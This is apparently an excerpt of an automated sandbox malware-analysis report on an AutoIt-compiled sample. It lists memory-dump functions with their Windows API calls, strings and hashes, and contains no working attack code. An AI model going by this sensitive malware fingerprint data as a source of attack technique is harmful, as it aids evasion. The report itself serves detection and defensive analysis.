String ID:
API String ID: 2583163307-0
Opcode ID: 877e8e73f19cacfde6eca087cc69cde6959f722039de1d3664405e2ce45a220a
Instruction ID: 2951c5aef96608812d10f05161ea9d973d640253f2745b4340211f5dbdd56c3e
Opcode Fuzzy Hash: 877e8e73f19cacfde6eca087cc69cde6959f722039de1d3664405e2ce45a220a
Instruction Fuzzy Hash: D8012B33A3567027D6AD6A346889B7E6B4D4B82774F3A0199F9188B1D3DEA0CCE18550

Uniqueness

Uniqueness Score: -1.00%

Function 00282FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00282FF2
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00282CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00283006
CloseHandle.KERNEL32(00000000), ref: 0028300D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 90681d7f935209f8fb4982483fcee962312e13013caa69ddcfe6e5ccb3713872
Instruction ID: 3e967af9934055cec0e07381276692268d610e4ccb1702127c25ed61c8522551
Opcode Fuzzy Hash: 90681d7f935209f8fb4982483fcee962312e13013caa69ddcfe6e5ccb3713872
Instruction Fuzzy Hash: A9E0863638131077D6312755BC0DF8B3A1CD787F71F204211F719750D08EA0550143A8

Uniqueness

Uniqueness Score: -1.00%

Function 00221310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002217F6

Strings

CALL, xrefs: 002217C6

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 63308dbfa5558b04079e4b6ae3afa6ed1f2083b3edb11274f8675b8ae0f1892e
Instruction ID: b2c8e2e3669a21f9443cfc41d016cfc244b4f6a8ee6dd5c5cb3e6ddf07d7e77b
Opcode Fuzzy Hash: 63308dbfa5558b04079e4b6ae3afa6ed1f2083b3edb11274f8675b8ae0f1892e
Instruction Fuzzy Hash: 78229970628212AFC714DF54E484E2ABBF1AF95304F64896DF4868B361D771E8B1CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00286EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00286F6B

Part of subcall function 00214ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00286F5A, 00286F63

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: fc0b18ee8969470469cef67a869074cea221341f5b0061f471decec53811842e
Instruction ID: 3b9d8dad527a2f6fcfb2d9759e30f790a5176837a53265bca3183264bb21d154
Opcode Fuzzy Hash: fc0b18ee8969470469cef67a869074cea221341f5b0061f471decec53811842e
Instruction Fuzzy Hash: 8FB196351292019FCB14FF24C4919AEB7E5BFA4300F14895DF89A972A1DB30EDA5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0024C827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 0024C84C

Strings

, xrefs: 0024C891

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: f5a70f2b4446618da1f796bcf2e7543960b90765d1b08cebd74720d7c9fcb53b
Instruction ID: 95f3f21f4ee70ec467d4147d631d1773e1775eeccc26419a28c080e3a40b3039
Opcode Fuzzy Hash: f5a70f2b4446618da1f796bcf2e7543960b90765d1b08cebd74720d7c9fcb53b
Instruction Fuzzy Hash: 08415D70515388AADF2A8E68CC84BF6BBE9EB45304F2404ECD58A87142D2759955DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00282557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00282587

Strings

EA06, xrefs: 002825B9

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 5f1ee84d82e688af6e5d3fc18653c58418e40688e06c22081e8d19b1fda34031
Instruction ID: ee3fbe731c0e5fd406c75a134bf2ac52718991bf469df410a4b011a7d2b64bcb
Opcode Fuzzy Hash: 5f1ee84d82e688af6e5d3fc18653c58418e40688e06c22081e8d19b1fda34031
Instruction Fuzzy Hash: A001B5B2954258BEDF28D7A8C856FAEBBF89B05301F00455AE592D21C1E5B8E6188B60

Uniqueness

Uniqueness Score: -1.00%

Function 00243467 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 002434D8

Strings

LCMapStringEx, xrefs: 00243478, 00243482

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: f0497e9fb3e2d8b1df544df0929b87006e41e65c8c13a53231c71809095271ae
Instruction ID: 109577bf7b91feec95563cadd384a89dc93482f309c3ee8446a2bd6691358492
Opcode Fuzzy Hash: f0497e9fb3e2d8b1df544df0929b87006e41e65c8c13a53231c71809095271ae
Instruction Fuzzy Hash: 6201253261020DFBCF169F91DD06EEE3FA2EF48750F058094FE1466160CA368A30EB94

Uniqueness

Uniqueness Score: -1.00%

Function 00243162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 002431A1

Strings

FlsAlloc, xrefs: 00243173, 0024317D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: dcfe6030219e2a0879548e77bf64b5a83e6b0ba081c7c5b9cc2cba786ccb61a1
Instruction ID: 5a216de173319d32296d1ba983e8d9843f7869affc0806d961fd4342bf9088ba
Opcode Fuzzy Hash: dcfe6030219e2a0879548e77bf64b5a83e6b0ba081c7c5b9cc2cba786ccb61a1
Instruction Fuzzy Hash: 61E0AB31B6030CEBD709ABA0AC0AEADBB94EF45B51B100055FD0997240CD700F249AEA

Uniqueness

Uniqueness Score: -1.00%

Function 00233600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00233615

Strings

FlsAlloc, xrefs: 00233604, 0023360E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: ebccb3b82c13557d573010b62f9aa6d02f342da0c9a5ce250fcb41848da7919f
Instruction ID: ea63d15cb0f7e05ebecccd4e49612635f1fe975bbdb37549efc2b69278935cfd
Opcode Fuzzy Hash: ebccb3b82c13557d573010b62f9aa6d02f342da0c9a5ce250fcb41848da7919f
Instruction Fuzzy Hash: FDD012326992246FC6513AD4BE0AAA9BA549B43BB2F040071FE08956919D598A3046C5

Uniqueness

Uniqueness Score: -1.00%

Function 0024CB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0024C74F: GetOEMCP.KERNEL32(00000000), ref: 0024C77A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0024CA1D,?,00000000), ref: 0024CBF0
GetCPInfo.KERNEL32(00000000,0024CA1D,?,?,?,0024CA1D,?,00000000), ref: 0024CC03

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 9605621a2b83fc382c9881dc0b4f1063d5985835c5fd6bea7b37c47fe6e56d72
Instruction ID: a724bd2c962543c64a9bdbb6c25e2ab132591d86bf09340b066f13b34b82820a
Opcode Fuzzy Hash: 9605621a2b83fc382c9881dc0b4f1063d5985835c5fd6bea7b37c47fe6e56d72
Instruction Fuzzy Hash: 8D514470E212069FDB689F7DC8856BABBE4EF41300F3480AFD09A8B251D7759961CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0024C9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00242D74: GetLastError.KERNEL32(?,?,00245686,00253CD6,?,00000000,?,00245B6A,?,?,?,?,?,0023E6D1,?,002D8A48), ref: 00242D78
Part of subcall function 00242D74: _free.LIBCMT ref: 00242DAB
Part of subcall function 00242D74: SetLastError.KERNEL32(00000000,?,?,?,?,0023E6D1,?,002D8A48,00000010,00214F4A,?,?,00000000,00253CD6), ref: 00242DEC
Part of subcall function 00242D74: _abort.LIBCMT ref: 00242DF2

Part of subcall function 0024CADA: _abort.LIBCMT ref: 0024CB0C
Part of subcall function 0024CADA: _free.LIBCMT ref: 0024CB40

Part of subcall function 0024C74F: GetOEMCP.KERNEL32(00000000), ref: 0024C77A

_free.LIBCMT ref: 0024CA33
_free.LIBCMT ref: 0024CA69

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 3e1f34d88df8945885de265aa4654b79c865d18c1bc83616568542b2fe58933c
Instruction ID: c5c5c1b0abf97a95952e2f2467f34f0aaf41185f723a0fe0d1545246ae23ab93
Opcode Fuzzy Hash: 3e1f34d88df8945885de265aa4654b79c865d18c1bc83616568542b2fe58933c
Instruction Fuzzy Hash: 8F31CF31911219AFDB58EFADD441AA9B7F5EF40324F31019AE8049B2A2EB719D60CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00242FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00211129,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue,002B2290,FlsSetValue,00000000,00000364,?,00242E46,00000000), ref: 00243037
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00243044

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 583957ff352e3ab0bf05833a071dcb53539c047062686c40861c4a33d367a0d5
Instruction ID: 2ec5120f3b88a07aba3c799d905275e8e795db1d7a49bff494d2b1318eb5f88a
Opcode Fuzzy Hash: 583957ff352e3ab0bf05833a071dcb53539c047062686c40861c4a33d367a0d5
Instruction Fuzzy Hash: 57113A33A201229B9B39DE18FC40A5A7391AB807607160320FD15EB298CB31DD21C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00215745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00215773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00254052

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ddbf8440c241d97f99692ba3ccc239b01753d39a1e4fb38522a12910ddfb98e
Instruction ID: 50ca075b07c5dd43a86aeed5169755355b97c0cb95cbabd59c7470d9df10da8c
Opcode Fuzzy Hash: 2ddbf8440c241d97f99692ba3ccc239b01753d39a1e4fb38522a12910ddfb98e
Instruction Fuzzy Hash: FB018430255325F6E3311A25DC0EF97BF94DF42774F108200BA5C5A1E0CBB454A5CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00233414 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00233600: try_get_function.LIBVCRUNTIME ref: 00233615

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00233432
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0023343D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 4a9bbcdad6639d10c5f05598b7386b0dfb4d27b54206f055ff0a0c846dbef4a4
Instruction ID: b24fbb04a782cc9b0e2a6ade3e92b9a9c3f0babf71a9ec45e7a7d255c10c763e
Opcode Fuzzy Hash: 4a9bbcdad6639d10c5f05598b7386b0dfb4d27b54206f055ff0a0c846dbef4a4
Instruction Fuzzy Hash: 46D0A7F1634302681C05EBB5380305913445402B75FA05256E620C52C1DB6087712C16

Uniqueness

Uniqueness Score: -1.00%

Function 00216E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00219879,?,?,?), ref: 00216E33
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00219879,?,?,?), ref: 00216E69

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: c93e6a3eb9a6d688407833e22870bd64cceb27ec08fc5223209ff115d791dbce
Instruction ID: 72258c77ed7516e8a19400b189ca3d5e251976931c071f7c295551413344302f
Opcode Fuzzy Hash: c93e6a3eb9a6d688407833e22870bd64cceb27ec08fc5223209ff115d791dbce
Instruction Fuzzy Hash: A601DF713152047FEB196BB9AD0BFBF7AEDDB85300F14013EB106DA1E1EDA0AC108A20

Uniqueness

Uniqueness Score: -1.00%

Function 00214ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00214E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E9C
Part of subcall function 00214E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EAE
Part of subcall function 00214E90: FreeLibrary.KERNEL32(00000000,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EFD

Part of subcall function 00214E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E62
Part of subcall function 00214E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E74
Part of subcall function 00214E59: FreeLibrary.KERNEL32(00000000,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E87

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 4098dc99764eadba985eaa2c7e94e9e66a7e2710f318b884688a56e199bcb752
Instruction ID: 60601c0bad47d4fcdeab0b26c271062d35323dfb2e89f5523c83089a4d7d3f15
Opcode Fuzzy Hash: 4098dc99764eadba985eaa2c7e94e9e66a7e2710f318b884688a56e199bcb752
Instruction Fuzzy Hash: 92110431630205ABCF10FF60D802BEE77E49F60715F20442AF446AA2C1DE749AA59B50

Uniqueness

Uniqueness Score: -1.00%

Function 00248402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00248440

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 9b1e20d357f84c23ab3ec0187accd54887513bafd4253588253ead5b7e52d57e
Instruction ID: 167ca451bf2fd2b699cc7c70644c00b6d8462be1a6639173d1422cde69389a47
Opcode Fuzzy Hash: 9b1e20d357f84c23ab3ec0187accd54887513bafd4253588253ead5b7e52d57e
Instruction Fuzzy Hash: AB11187591410AAFCB09DF58E98199E7BF5EF48314F144059FC08AB312DA31EA21CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00219A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,00000000,00000000), ref: 00219A9C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

